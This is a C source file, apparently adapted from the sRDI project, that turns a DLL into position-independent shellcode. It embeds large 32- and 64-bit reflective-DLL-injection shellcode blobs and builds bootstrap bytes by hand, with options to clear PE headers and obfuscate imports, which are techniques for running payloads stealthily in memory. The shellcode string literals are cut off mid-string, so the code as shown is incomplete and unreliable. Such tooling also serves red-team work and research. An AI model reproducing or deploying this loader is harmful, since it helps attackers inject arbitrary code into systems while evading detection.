268 lines
30 KiB
C
268 lines
30 KiB
C
|
// RDIShellcodeCLoader.cpp : Defines the entry point for the console application.
|
||
|
|
// https://github.com/Drewsif/sRDI/blob/master/Native/Loader.cpp
|
||
|
|
|
||
|
|
#include <windows.h>
|
||
|
|
|
||
|
|
#define DEREF_64( name )*(DWORD64 *)(name)
|
||
|
|
#define DEREF_32( name )*(DWORD *)(name)
|
||
|
|
#define DEREF_16( name )*(WORD *)(name)
|
||
|
|
#define DEREF_8( name )*(BYTE *)(name)
|
||
|
|
|
||
|
|
#define ROTR32(value, shift) (((DWORD) value >> (BYTE) shift) | ((DWORD) value << (32 - (BYTE) shift)))
|
||
|
|
#define RVA(type, base, rva) (type)((ULONG_PTR) base + rva)
|
||
|
|
|
||
|
|
#define SRDI_CLEARHEADER 0x1
|
||
|
|
#define SRDI_CLEARMEMORY 0x2
|
||
|
|
#define SRDI_OBFUSCATEIMPORTS 0x4
|
||
|
|
#define SRDI_PASS_SHELLCODE_BASE 0x8
|
||
|
|
|
||
|
|
BOOL Is64BitDLL(UINT_PTR uiLibraryAddress)
|
||
|
|
{
|
||
|
|
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
|
||
|
|
|
||
|
|
if (pNtHeaders->OptionalHeader.Magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC) return TRUE;
|
||
|
|
else return FALSE;
|
||
|
|
}
|
||
|
|
|
||
|
|
BOOL ConvertToShellcode(LPVOID inBytes, DWORD length, DWORD userFunction, LPVOID userData, DWORD userLength, DWORD flags, LPSTR *outBytes, DWORD *outLength)
|
||
|
|
{
|
||
|
|
const char* rdiShellcode = NULL;
|
||
|
|
DWORD rdiShellcodeLength, dllOffset, userDataLocation;
|
||
|
|
|
||
|
|
#if 0 // _DEBUG
|
||
|
|
LPSTR rdiShellcode64 = NULL, rdiShellcode32 = NULL;
|
||
|
|
DWORD rdiShellcode64Length = 0, rdiShellcode32Length = 0;
|
||
|
|
GetFileContents("../bin/ShellcodeRDI_x64.bin", &rdiShellcode64, rdiShellcode64Length);
|
||
|
|
GetFileContents("../bin/ShellcodeRDI_x86.bin", &rdiShellcode32, rdiShellcode32Length);
|
||
|
|
|
||
|
|
#else
|
||
|
|
//MARKER:S
|
||
|
|
const char* rdiShellcode32 = "\x81\xEC\x14\x01\x00\x00\x53\x55\x56\x57\x6A\x6B\x58\x6A\x65\x66\x89\x84\x24\xCC\x00\x00\x00\x33\xED\x58\x6A\x72\x59\x6A\x6E\x5B\x6A\x6C\x5A\x6A\x33\x66\x89\x84\x24\xCE\x00\x00\x00\x66\x89\x84\x24\xD4\x00\x00\x00\x58\x6A\x32\x66\x89\x84\x24\xD8\x00\x00\x00\x58\x6A\x2E\x66\x89\x84\x24\xDA\x00\x00\x00\x58\x6A\x64\x66\x89\x84\x24\xDC\x00\x00\x00\x58\x89\xAC\x24\xB4\x00\x00\x00\x89\x6C\x24\x38\x89\xAC\x24\xBC\x00\x00\x00\x89\xAC\x24\xC4\x00\x00\x00\x89\xAC\x24\xB8\x00\x00\x00\x89\xAC\x24\xB0\x00\x00\x00\x89\xAC\x24\xE0\x00\x00\x00\x66\x89\x8C\x24\xCC\x00\x00\x00\x66\x89\x9C\x24\xCE\x00\x00\x00\x66\x89\x94\x24\xD2\x00\x00\x00\x66\x89\x84\x24\xDA\x00\x00\x00\x66\x89\x94\x24\xDC\x00\x00\x00\x66\x89\x94\x24\xDE\x00\x00\x00\xC6\x44\x24\x3C\x53\x88\x54\x24\x3D\x66\xC7\x44\x24\x3E\x65\x65\xC6\x44\x24\x40\x70\x66\xC7\x44\x24\x50\x4C\x6F\xC6\x44\x24\x52\x61\x88\x44\x24\x53\x66\xC7\x44\x24\x54\x4C\x69\xC6\x44\x24\x56\x62\x88\x4C\x24\x57\xC6\x44\x24\x58\x61\x88\x4C\x24\x59\x66\xC7\x44\x24\x5A\x79\x41\x66\xC7\x44\x24\x44\x56\x69\x88\x4C\x24\x46\x66\xC7\x44\x24\x47\x74\x75\xC6\x44\x24\x49\x61\x88\x54\x24\x4A\xC6\x44\x24\x4B\x41\x88\x54\x24\x4C\x88\x54\x24\x4D\x66\xC7\x44\x24\x4E\x6F\x63\x66\xC7\x44\x24\x5C\x56\x69\x88\x4C\x24\x5E\x66\xC7\x44\x24\x5F\x74\x75\xC6\x44\x24\x61\x61\x88\x54\x24\x62\xC6\x44\x24\x63\x50\x88\x4C\x24\x64\xC7\x44\x24\x65\x6F\x74\x65\x63\xC6\x44\x24\x69\x74\xC6\x84\x24\x94\x00\x00\x00\x46\x88\x94\x24\x95\x00\x00\x00\xC7\x84\x24\x96\x00\x00\x00\x75\x73\x68\x49\x88\x9C\x24\x9A\x00\x00\x00\x66\xC7\x84\x24\x9B\x00\x00\x00\x73\x74\x88\x8C\x24\x9D\x00\x00\x00\xC7\x84\x24\x9E\x00\x00\x00\x75\x63\x74\x69\xC6\x84\x24\xA2\x00\x00\x00\x6F\x6A\x65\x59\x88\x8C\x24\xA8\x00\x00\x00\x88\x4C\x24\x6D\x88\x4C\x24\x74\x88\x4C\x24\x79\x88\x8C\x24\x92\x00\x00\x00\xB9\x13\x9C\xBF\xBD\x88\x9C\x24\xA3\x00\x00\x00\xC7\x84\x24\xA4\x00\x00\x00\x43\x61\x63\x68\xC6\x44\x24\x6C\x47\xC7\x44\x24\x6E\x74\x4E\x61\x74\x66\xC7\x44\x24\x72\x69\x76\xC7\x44\x24\x75\x53\x79\x73\x74\x66\xC7\x44\x24\x7A\x6D\x49\x88\x5C\x24\x7C\x66\xC7\x44\x24\x7D\x66\x6F\x66\xC7\x84\x24\x80\x00\x00\x00\x52\x74\x88\x94\x24\x82\x00\x00\x00\xC6\x84\x24\x83\x00\x00\x00\x41\x88\x84\x24\x84\x00\x00\x00\x88\x84\x24\x85\x00\x00\x00\x66\xC7\x84\x24\x86\x00\x00\x00\x46\x75\x88\x9C\x24\x88\x00\x00\x00\xC7\x84\x24\x89\x00\x00\x00\x63\x74\x69\x6F\x88\x9C\x24\x8D\x00\x00\x00\x66\xC7\x84\x24\x8E\x00\x00\x00\x54\x61\xC6\x84\x24\x90\x00\x00\x00\x62\x88\x94\x24\x91\x00\x00\x00\xE8\x49\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x8B\xF0\xE8\x3D\x08\x00\x00\x8B\xD8\x8D\x84\x24\xC8\x00\x00\x00\x6A\x18\x89\x84\x24\xEC\x00\x00\x00\x58\x66\x89\x84\x24\xE6\x00\x00\x00\x66\x89\x84\x24\xE4\x00\x00\x00\x8D\x44\x24\x1C\x50\x8D\x84\x24\xE8\x00\x00\x00\x89\x5C\x24\x38\x50\x55\x55\xFF\xD6\x6A\x0C\x5F\x8D\x44\x24\x44\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x44\x24\x38\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x0E\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x5C\x89\x44\x24\x14\x8D\x84\x24\xB8\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x15\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x84\x24\x94\x00\x00\x00\x89\x44\x24\x14\x8D\x84\x24\xBC\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x13\x5E\x8D\x44\x24\x6C\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xC4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x6A\x05\x58\x66\x89\x44\x24\x10\x66\x89\x44\x24\x12\x8D\x44\x24\x3C\x89\x44\x24\x14\x8D\x84\x24\xB0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x84\x24\x80\x00\x00\x00\x66\x89\x74\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xE0\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x74\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x8D\x44\x24\x50\x66\x89\x7C\x24\x10\x89\x44\x24\x14\x8D\x84\x24\xB4\x00\x00\x00\x50\x55\x8D\x44\x24\x18\x66\x89\x7C\x24\x1A\x50\xFF\x74\x24\x28\xFF\xD3\x39\x6C\x24\x38\x0F\x84\xD2\x06\x00\x00\x39\xAC\x24\xB8\x00\x00\x00\x0F\x84\xC5\x06\x00\x00\x39\xAC\x24\xB0\x00\x00\x00\x0F\x84\xB8\x06\x00\x00\x39\xAC\x24\xBC\x00\x00\x00\x0F\x84\xAB\
|
||
|
|
const char* rdiShellcode64 = "\x48\x8B\xC4\x48\x89\x58\x08\x44\x89\x48\x20\x4C\x89\x40\x18\x89\x50\x10\x55\x56\x57\x41\x54\x41\x55\x41\x56\x41\x57\x48\x8D\x6C\x24\x90\x48\x81\xEC\x70\x01\x00\x00\x45\x33\xFF\xC7\x45\xD0\x6B\x00\x65\x00\x48\x8B\xF1\x4C\x89\x7D\xF8\xB9\x13\x9C\xBF\xBD\x4C\x89\x7D\xC8\x44\x8B\xEA\x4C\x89\x7D\x08\x45\x8D\x4F\x65\x4C\x89\x7D\x10\x44\x88\x4D\xBC\x44\x88\x4D\xA2\x4C\x89\x7D\x00\x4C\x89\x7D\xE8\x4C\x89\x7D\x18\x44\x89\x7D\x24\x44\x89\x7C\x24\x24\xC7\x45\xD4\x72\x00\x6E\x00\xC7\x45\xD8\x65\x00\x6C\x00\xC7\x45\xDC\x33\x00\x32\x00\xC7\x45\xE0\x2E\x00\x64\x00\xC7\x45\xE4\x6C\x00\x6C\x00\xC7\x44\x24\x40\x53\x6C\x65\x65\xC6\x44\x24\x44\x70\xC7\x44\x24\x58\x4C\x6F\x61\x64\xC7\x44\x24\x5C\x4C\x69\x62\x72\xC7\x44\x24\x60\x61\x72\x79\x41\xC7\x44\x24\x48\x56\x69\x72\x74\xC7\x44\x24\x4C\x75\x61\x6C\x41\xC7\x44\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x64\x08\x00\x00\xB9\xB5\x41\xD9\x5E\x48\x8B\xD8\xE8\x57\x08\x00\x00\x4C\x8B\xE0\x48\x89\x45\xF0\x48\x8D\x45\xD0\xC7\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xC8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x00\xC7\x44\x24\x20\x0E\x00\x0E\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\xC7\x44\x24\x20\x15\x00\x15\x00\x48\x8B\x4C\x24\x38\x48\x8D\x45\xA8\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x08\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x10\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xE8\xC7\x44\x24\x20\x05\x00\x05\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\x18\xC7\x44\x24\x20\x13\x00\x13\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0\x48\x89\x44\x24\x28\x4C\x8D\x4D\xF8\xC7\x44\x24\x20\x0C\x00\x0C\x00\x48\x8D\x54\x24\x20\x41\xFF\xD4\x4C\x39\x7D\xC8\x0F\x84\x03\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\xF9\x06\x00\x00\x4C\x39\x7D\xE8\x0F\x84\xEF\x06\x00\x00\x4C\x39\x7D\x08\x0F\x84\xE5\x06\x00\x00\x4C\x8B\x4D\x10\x4D\x85\xC9\x0F\x84\xD8\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50\x45\x00\x00\x0F\x85\xC5\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xB6\x06\x00\x00\x44\x8B\x47\x38\x45\x8D\x5F\x01\x45\x84\xC3\x0F\x85\xA5\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x29\x44\x0F\xB7\x57\x06\x48\x03\xCF\x8B\x41\x04\x8B\x11\x85\xC0\x75\x06\x41\x8D\x04\x10\xEB\x02\x03\xC2\x3B\xC3\x0F\x46\xC3\x48\x83\xC1\x28\x8B\xD8\x4D\x2B\xD3\x75\xDF\x48\x8D\x4D\x38\x41\xFF\xD1\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x32\x06\x00\x00\x48\x8B\x4F\x30\x41\xB9\x04\x00\x00\x00\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8\x48\x85\xC0\x75\x15\x44\x8D\x48\x04\x41\xB8\x00\x30\x00\x00\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B\xD8\x41\xBB\x01\x00\x00\x00\x44\x84\x9D\xD8\x00\x00\x00\x74\x1D\x8B\x46\x3C\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48
|
||
|
|
DWORD rdiShellcode32Length = 2981, rdiShellcode64Length = 2772;
|
||
|
|
//MARKER:E
|
||
|
|
#endif
|
||
|
|
|
||
|
|
if (Is64BitDLL((UINT_PTR)inBytes))
|
||
|
|
{
|
||
|
|
rdiShellcode = rdiShellcode64;
|
||
|
|
rdiShellcodeLength = rdiShellcode64Length;
|
||
|
|
|
||
|
|
if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
|
||
|
|
|
||
|
|
BYTE bootstrap[69] = { 0 };
|
||
|
|
DWORD i = 0;
|
||
|
|
|
||
|
|
// call next instruction (Pushes next instruction address to stack)
|
||
|
|
bootstrap[i++] = 0xe8;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
|
||
|
|
// Set the offset to our DLL from pop result
|
||
|
|
dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
|
||
|
|
|
||
|
|
// pop rcx - Capture our current location in memory
|
||
|
|
bootstrap[i++] = 0x59;
|
||
|
|
|
||
|
|
// mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
|
||
|
|
bootstrap[i++] = 0x49;
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0xc8;
|
||
|
|
|
||
|
|
// mov edx, <hash of function>
|
||
|
|
bootstrap[i++] = 0xba;
|
||
|
|
MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
|
||
|
|
i += sizeof(userFunction);
|
||
|
|
|
||
|
|
// Setup the location of our user data
|
||
|
|
// add r8, <Offset of the DLL> + <Length of DLL>
|
||
|
|
bootstrap[i++] = 0x49;
|
||
|
|
bootstrap[i++] = 0x81;
|
||
|
|
bootstrap[i++] = 0xc0;
|
||
|
|
userDataLocation = dllOffset + length;
|
||
|
|
MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
|
||
|
|
i += sizeof(userDataLocation);
|
||
|
|
|
||
|
|
// mov r9d, <Length of User Data>
|
||
|
|
bootstrap[i++] = 0x41;
|
||
|
|
bootstrap[i++] = 0xb9;
|
||
|
|
MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
|
||
|
|
i += sizeof(userLength);
|
||
|
|
|
||
|
|
// push rsi - save original value
|
||
|
|
bootstrap[i++] = 0x56;
|
||
|
|
|
||
|
|
// mov rsi, rsp - store our current stack pointer for later
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0xe6;
|
||
|
|
|
||
|
|
// and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x83;
|
||
|
|
bootstrap[i++] = 0xe4;
|
||
|
|
bootstrap[i++] = 0xf0;
|
||
|
|
|
||
|
|
// sub rsp, 0x30 - Create some breathing room on the stack
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x83;
|
||
|
|
bootstrap[i++] = 0xec;
|
||
|
|
bootstrap[i++] = 6 * 8; // 32 bytes for shadow space + 16 bytes for last args
|
||
|
|
|
||
|
|
// mov qword ptr [rsp + 0x20], rcx (shellcode base) - Push in arg 5
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0x4C;
|
||
|
|
bootstrap[i++] = 0x24;
|
||
|
|
bootstrap[i++] = 4 * 8;
|
||
|
|
|
||
|
|
// add rcx, <Offset of the DLL>
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x81;
|
||
|
|
bootstrap[i++] = 0xc1;
|
||
|
|
MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
|
||
|
|
i += sizeof(dllOffset);
|
||
|
|
|
||
|
|
// mov dword ptr [rsp + 0x28], <Flags> - Push arg 6 just above shadow space
|
||
|
|
bootstrap[i++] = 0xC7;
|
||
|
|
bootstrap[i++] = 0x44;
|
||
|
|
bootstrap[i++] = 0x24;
|
||
|
|
bootstrap[i++] = 5 * 8;
|
||
|
|
MoveMemory(bootstrap + i, &flags, sizeof(flags));
|
||
|
|
i += sizeof(flags);
|
||
|
|
|
||
|
|
// call - Transfer execution to the RDI
|
||
|
|
bootstrap[i++] = 0xe8;
|
||
|
|
bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip over the remainder of instructions
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
|
||
|
|
// mov rsp, rsi - Reset our original stack pointer
|
||
|
|
bootstrap[i++] = 0x48;
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0xf4;
|
||
|
|
|
||
|
|
// pop rsi - Put things back where we left them
|
||
|
|
bootstrap[i++] = 0x5e;
|
||
|
|
|
||
|
|
// ret - return to caller
|
||
|
|
bootstrap[i++] = 0xc3;
|
||
|
|
|
||
|
|
// Ends up looking like this in memory:
|
||
|
|
// Bootstrap shellcode
|
||
|
|
// RDI shellcode
|
||
|
|
// DLL bytes
|
||
|
|
// User data
|
||
|
|
*outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
|
||
|
|
*outBytes = (LPSTR)malloc(*outLength);
|
||
|
|
MoveMemory(*outBytes, bootstrap, sizeof(bootstrap));
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
|
||
|
|
}
|
||
|
|
else { // 32 bit
|
||
|
|
rdiShellcode = rdiShellcode32;
|
||
|
|
rdiShellcodeLength = rdiShellcode32Length;
|
||
|
|
|
||
|
|
if (rdiShellcode == NULL || rdiShellcodeLength == 0) return 0;
|
||
|
|
|
||
|
|
BYTE bootstrap[50] = { 0 };
|
||
|
|
DWORD i = 0;
|
||
|
|
|
||
|
|
// call next instruction (Pushes next instruction address to stack)
|
||
|
|
bootstrap[i++] = 0xe8;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
|
||
|
|
// Set the offset to our DLL from pop result
|
||
|
|
dllOffset = sizeof(bootstrap) - i + rdiShellcodeLength;
|
||
|
|
|
||
|
|
// pop eax - Capture our current location in memory
|
||
|
|
bootstrap[i++] = 0x58;
|
||
|
|
|
||
|
|
// push ebp
|
||
|
|
bootstrap[i++] = 0x55;
|
||
|
|
|
||
|
|
// move ebp, esp
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0xe5;
|
||
|
|
|
||
|
|
// mov edx, eax - copy our location in memory to ebx before we start modifying eax
|
||
|
|
bootstrap[i++] = 0x89;
|
||
|
|
bootstrap[i++] = 0xc2;
|
||
|
|
|
||
|
|
// add edx, <Offset to the DLL> + <Size of DLL>
|
||
|
|
bootstrap[i++] = 0x81;
|
||
|
|
bootstrap[i++] = 0xc2;
|
||
|
|
userDataLocation = dllOffset + length;
|
||
|
|
MoveMemory(bootstrap + i, &userDataLocation, sizeof(userDataLocation));
|
||
|
|
i += sizeof(userDataLocation);
|
||
|
|
|
||
|
|
// push <Flags>
|
||
|
|
bootstrap[i++] = 0x68;
|
||
|
|
MoveMemory(bootstrap + i, &flags, sizeof(flags));
|
||
|
|
i += sizeof(flags);
|
||
|
|
|
||
|
|
// push eax
|
||
|
|
bootstrap[i++] = 0x50;
|
||
|
|
|
||
|
|
// push <Length of User Data>
|
||
|
|
bootstrap[i++] = 0x68;
|
||
|
|
MoveMemory(bootstrap + i, &userLength, sizeof(userLength));
|
||
|
|
i += sizeof(userLength);
|
||
|
|
|
||
|
|
// push edx
|
||
|
|
bootstrap[i++] = 0x52;
|
||
|
|
|
||
|
|
// push <hash of function>
|
||
|
|
bootstrap[i++] = 0x68;
|
||
|
|
MoveMemory(bootstrap + i, &userFunction, sizeof(userFunction));
|
||
|
|
i += sizeof(userFunction);
|
||
|
|
|
||
|
|
// add eax, <Offset to the DLL>
|
||
|
|
bootstrap[i++] = 0x05;
|
||
|
|
MoveMemory(bootstrap + i, &dllOffset, sizeof(dllOffset));
|
||
|
|
i += sizeof(dllOffset);
|
||
|
|
|
||
|
|
// push eax
|
||
|
|
bootstrap[i++] = 0x50;
|
||
|
|
|
||
|
|
// call - Transfer execution to the RDI
|
||
|
|
bootstrap[i++] = 0xe8;
|
||
|
|
bootstrap[i++] = sizeof(bootstrap) - i - 4; // Skip the remainder of instructions
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
bootstrap[i++] = 0x00;
|
||
|
|
|
||
|
|
// add esp, 0x14 - clean up stack from args (cdecl)
|
||
|
|
bootstrap[i++] = 0x83;
|
||
|
|
bootstrap[i++] = 0xc4;
|
||
|
|
bootstrap[i++] = 0x14;
|
||
|
|
|
||
|
|
// leave
|
||
|
|
bootstrap[i++] = 0xc9;
|
||
|
|
|
||
|
|
// ret - return to caller
|
||
|
|
bootstrap[i++] = 0xc3;
|
||
|
|
|
||
|
|
// Ends up looking like this in memory:
|
||
|
|
// Bootstrap shellcode
|
||
|
|
// RDI shellcode
|
||
|
|
// DLL bytes
|
||
|
|
// User data
|
||
|
|
*outLength = length + userLength + rdiShellcodeLength + sizeof(bootstrap);
|
||
|
|
*outBytes = (LPSTR)malloc(*outLength);
|
||
|
|
MoveMemory(*outBytes, bootstrap, sizeof(bootstrap));
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap), rdiShellcode, rdiShellcodeLength);
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap) + rdiShellcodeLength, inBytes, length);
|
||
|
|
MoveMemory(*outBytes + sizeof(bootstrap) + rdiShellcodeLength + length, userData, userLength);
|
||
|
|
}
|
||
|
|
|
||
|
|
return TRUE;
|
||
|
|
}
|